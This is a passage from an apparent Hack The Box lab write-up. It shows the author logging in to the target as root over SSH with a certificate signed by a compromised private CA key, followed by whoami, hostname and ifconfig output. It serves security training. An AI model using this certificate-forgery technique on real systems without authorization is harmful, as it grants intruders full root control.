SSH
Using the signed public key with the private CA key to authenticate to the target SSH server
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ssh root@$IP -o CertificateFile=root-itrc-cert.pub -i ca-itrc
Linux itrc 5.15.0-117-generic #127-Ubuntu SMP Fri Jul 5 20:13:28 UTC 2024 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 4 21:16:39 2024 from 127.0.0.1
root@itrc:~# whoami
root
root@itrc:~# hostname
itrc
root@itrc:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.223.0.3 netmask 255.255.0.0 broadcast 172.223.255.255
ether 02:42:ac:df:00:03 txqueuelen 0 (Ethernet)
RX packets 22305999 bytes 2160562356 (2.0 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18308315 bytes 3218349858 (2.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 453253 bytes 29725154 (28.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 453253 bytes 29725154 (28.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise
Privilege escalation made to the root account on the itrc host (Docker)